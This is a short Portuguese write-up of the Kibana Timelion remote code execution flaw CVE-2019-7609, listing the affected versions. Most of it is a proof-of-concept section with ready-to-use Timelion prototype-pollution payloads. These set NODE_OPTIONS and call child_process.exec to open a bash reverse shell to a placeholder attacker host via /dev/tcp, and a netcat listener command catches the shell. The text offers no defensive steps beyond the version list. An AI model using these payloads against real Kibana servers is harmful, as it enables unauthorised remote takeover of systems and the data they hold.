Vulnerabilidade de execução remota de código Kibana (CVE-2019-7609)
Introdução de vulnerabilidade
Um anúncio oficial em fevereiro de 2019 afirmou que o Kibana tem vulnerabilidades de execução remota de código. As versões do Kibana anteriores a 5.6.15 e 6.6.1 têm falhas funcionais na ferramenta de visualização do Timelion, permitindo que invasores usem Kibana para executar código arbitrário no servidor. Kibana é um plugin de visualização de dados de código aberto para Elasticsearch. Ele fornece funções de visualização para Elasticsearch, que podem ser usadas para pesquisar e visualizar os dados armazenados no índice Elasticsearch e pode visualizar os dados na forma de vários ícones, tabelas e mapas. Devido à sua conveniência funcional, é amplamente utilizado no desenvolvimento de produtos.
Esfera de influência
Versão afetada
Kibana <5.6.15 Kibana <6.6.1
Versão não
afetada Kibana = 5.6.15 Kibana> = 6.6.1
POC
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash - c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Recorrência de vulnerabilidade
Use o monitoramento nc no invasor
nc -nvlp 1234
Encontre uma página não autorizada para executar a
recuperação do shell com sucesso